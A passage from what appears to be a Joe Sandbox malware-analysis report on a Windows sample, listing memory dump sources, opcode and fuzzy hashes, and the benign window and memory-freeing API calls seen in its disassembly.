                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 98fe136b9cfa881cf9f058302bb5bb75cdcd441c69f98b27874bdfe55b2a8c34
                • Instruction ID: 4159a48a4091659ed553e88010b977be66ba879dbf72913d151900db1d4aea06
                • Opcode Fuzzy Hash: 98fe136b9cfa881cf9f058302bb5bb75cdcd441c69f98b27874bdfe55b2a8c34
                • Instruction Fuzzy Hash: B912D3B16047068BC728EF28C9D06B9B3E1FF54308F24892DE597C7A85E774E8A5CB45
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9c5bcd8171f8c5b5d90c75a082fd0ad13acf5ccccca096e24f35edcef61b4986
                • Instruction ID: b59ae0991d3493cf391bf9f5f0be768ae861840e2f9609842d5b3da49cd810a5
                • Opcode Fuzzy Hash: 9c5bcd8171f8c5b5d90c75a082fd0ad13acf5ccccca096e24f35edcef61b4986
                • Instruction Fuzzy Hash: 6CF17C726087059FC718CE29C484A6ABBE2FFC9318F148A2EF499D7359D730E9458B52
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                • Instruction ID: 11f28cba20474c5cdcb4fb8c0862d348c41c81c9b5e195cec2cbcfc3be64c2ef
                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                • Instruction Fuzzy Hash: 0AC190362150934EDF2D5679853403FBAA1EAA2BB132E076DE4B3CB1C5FE20D564DE20
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                • Instruction ID: f32678bbbe75f3a3d93ab91e1fccf8e9bc09d94f37a63835c9dde3f91bf31389
                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                • Instruction Fuzzy Hash: F3C195362191930EDF2D5679853803FBBB1AAA2BB131E176DD4B3CB5C4FE20D564DA20
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                • Instruction ID: 5c2e69eff2d91facaf059b410e2d3288ad7b40f54e0898e94e87c1f560e97de8
                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                • Instruction Fuzzy Hash: 67C171362051A30EDF6D5679857413FBAA1AEA2BB131E076DD4B3CB1C5FE20D524DE20
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 88bc9b176184bb4aa7111033b5e2c58b33d11ee14d61a505ba05f419903a59be
                • Instruction ID: 27dff4849456d0ce4a7da65f330b8290c236d58ba54e0c748e470c5ea278dd12
                • Opcode Fuzzy Hash: 88bc9b176184bb4aa7111033b5e2c58b33d11ee14d61a505ba05f419903a59be
                • Instruction Fuzzy Hash: D4D1D5B1A043468FDB14EF28C88475ABBE0FF55308F04456DE845DB742E734E969CB9A
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                • Instruction ID: eb752840efe38a0f6446fb5eeb5f0bb791eb07ccb4ccdee3119b07e6b6885f6d
                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                • Instruction Fuzzy Hash: 3EC182362051930EDF6D567A853403FBAA1BAA2BB132E076DD4B3CB1D5FE20D564DE20
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 186389beca9fa2361eed65f07661e43c8cfdc82bc553bef632f0eb54f344472d
                • Instruction ID: 998f1c4b3821507cea1ed95b7b00e7af7a1c58a8560559354b2ec9c617146ccf
                • Opcode Fuzzy Hash: 186389beca9fa2361eed65f07661e43c8cfdc82bc553bef632f0eb54f344472d
                • Instruction Fuzzy Hash: 72E137745183848FC304CF69D49096ABBF0BF8A300F894A9EF5D597352D339EA19DB62
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                • Instruction ID: 0773887665a5cc00b82e08c3482f9ae35daad55e1ee830660ae326ff131f5c1e
                • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                • Instruction Fuzzy Hash: 2A9142B02047498BDB28FA68C891BBE73D5FB90704F10492DE59BD7282EA79E745C342
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: da3243c0f6640210b9ca5f0d0b2ee900d8b2196134751d4366eb1281a5d782e9
                • Instruction ID: 8cd53a8357d10d4b01fb150a8f2ebb13aef3cb81b8fbadb561d18fd6a84b242a
                • Opcode Fuzzy Hash: da3243c0f6640210b9ca5f0d0b2ee900d8b2196134751d4366eb1281a5d782e9
                • Instruction Fuzzy Hash: 2D616871680B1856DE38BA6C8896FBF23C4FB41718F1C2A1AE883DB2D1D651DD43C75A
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                • Instruction ID: f18ae001ce61e92aaf36bd6576160d5f88277740889f46063ffd3309d480524e
                • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                • Instruction Fuzzy Hash: E1711D716043495BDB28FE2CC8D1B6D77E5FBD0B04F00492DEAC6CB682DA74DA858792
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                • Instruction ID: bded3450de2df12364777336debedd7308f4a152a22b56151b492d397ccf42f0
                • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                • Instruction Fuzzy Hash: CB513B70600A8C7ADF34B5A88895FBF6789FB53348F1C2929E942E7692C315DD478352
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 33fc01019bbf0679ff39583b3f12878c9adbb78d38dd5987ff7cbda8a6b75299
                • Instruction ID: 25c17262cb1da6f70e5efc299a61cadb2e72d2a418e9ccb67232755f57eba202
                • Opcode Fuzzy Hash: 33fc01019bbf0679ff39583b3f12878c9adbb78d38dd5987ff7cbda8a6b75299
                • Instruction Fuzzy Hash: FE817D8221D7D49DC7168F7C38A43B53FA1BB77241B1C42EAC4CAC6267D53A466CD721
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ad590153e46dc127ec9322a9df2d4dfdd520a7537b1d6bff7bc8761f8624080b
                • Instruction ID: 455fcfb71e2493bb81e741908cdaeab744661f2edddbf219da1b63cceeb54d8a
                • Opcode Fuzzy Hash: ad590153e46dc127ec9322a9df2d4dfdd520a7537b1d6bff7bc8761f8624080b
                • Instruction Fuzzy Hash: EC51AE315083A54EC712CF28918456EFFE1FEEA214F4988DEE4E98B217D230D649CB93
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 75dd8333d5d0cf86e1abcd6ee312d269315abe84277aea414d764f5e340d1547
                • Instruction ID: 616ef30074b4c8c31303c05099789341fc114d22b71d84a9536e5344dffa8576
                • Opcode Fuzzy Hash: 75dd8333d5d0cf86e1abcd6ee312d269315abe84277aea414d764f5e340d1547
                • Instruction Fuzzy Hash: CB514571A083168BC748CF19D48059AF7E1FFC8354F058A2EE899E3741DB34EA59CB96
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                • Instruction ID: dc8ff59b3d4d97795ac83f2427479afadccb35e374d6c58e33463847c0ffca12
                • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                • Instruction Fuzzy Hash: 8B31D3B16047498FCB18EF28C85126EBBE0FB95700F10892DE4D9C7742C779EA49CB92
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f7b3f98e3cc9e9c91e503fa469e1f696285d78e06c9febf6473e2db2abb5572b
                • Instruction ID: d29615f50b840be37015d8454e378388fcc6ac107a7376edea73c8893adb5d18
                • Opcode Fuzzy Hash: f7b3f98e3cc9e9c91e503fa469e1f696285d78e06c9febf6473e2db2abb5572b
                • Instruction Fuzzy Hash: BC21C232A205614BCB48CF2DECE087A7751F78B311746C22BEA46DB6D5C935E925CBA0
                APIs
                • _swprintf.LIBCMT ref: 0087DABE
                  • Part of subcall function 0087400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0087401D
                  • Part of subcall function 00881596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,008B0EE8,00000200,0087D202,00000000,?,00000050,008B0EE8), ref: 008815B3
                • _strlen.LIBCMT ref: 0087DADF
                • SetDlgItemTextW.USER32(?,008AE154,?), ref: 0087DB3F
                • GetWindowRect.USER32(?,?), ref: 0087DB79
                • GetClientRect.USER32(?,?), ref: 0087DB85
                • GetWindowLongW.USER32(?,000000F0), ref: 0087DC25
                • GetWindowRect.USER32(?,?), ref: 0087DC52
                • SetWindowTextW.USER32(?,?), ref: 0087DC95
                • GetSystemMetrics.USER32(00000008), ref: 0087DC9D
                • GetWindow.USER32(?,00000005), ref: 0087DCA8
                • GetWindowRect.USER32(00000000,?), ref: 0087DCD5
                • GetWindow.USER32(00000000,00000002), ref: 0087DD47
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                • String ID: $%s:$CAPTION$d
                • API String ID: 2407758923-2512411981
                • Opcode ID: 71c05769fad47b9103880a7210f55192dd95949be5ccdda67715c27f26b90236
                • Instruction ID: 0dac5420d973466b6bd746ab367f2b2510219d63c28f34d0eafe8cfba1044157
                • Opcode Fuzzy Hash: 71c05769fad47b9103880a7210f55192dd95949be5ccdda67715c27f26b90236
                • Instruction Fuzzy Hash: 2C818C72108301AFD711DF68CD89A6BBBF9FF89704F04891DFA89D3295D670E9098B52
                APIs
                • ___free_lconv_mon.LIBCMT ref: 0089C277
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BE2F
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BE41
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BE53
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BE65
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BE77
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BE89
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BE9B
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BEAD
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BEBF
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BED1
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BEE3
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BEF5
                  • Part of subcall function 0089BE12: _free.LIBCMT ref: 0089BF07
                • _free.LIBCMT ref: 0089C26C
                  • Part of subcall function 008984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958), ref: 008984F4
                  • Part of subcall function 008984DE: GetLastError.KERNEL32(008A3958,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958,008A3958), ref: 00898506
                • _free.LIBCMT ref: 0089C28E
                • _free.LIBCMT ref: 0089C2A3
                • _free.LIBCMT ref: 0089C2AE
                • _free.LIBCMT ref: 0089C2D0
                • _free.LIBCMT ref: 0089C2E3
                • _free.LIBCMT ref: 0089C2F1
                • _free.LIBCMT ref: 0089C2FC
                • _free.LIBCMT ref: 0089C334
                • _free.LIBCMT ref: 0089C33B
                • _free.LIBCMT ref: 0089C358
                • _free.LIBCMT ref: 0089C370
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
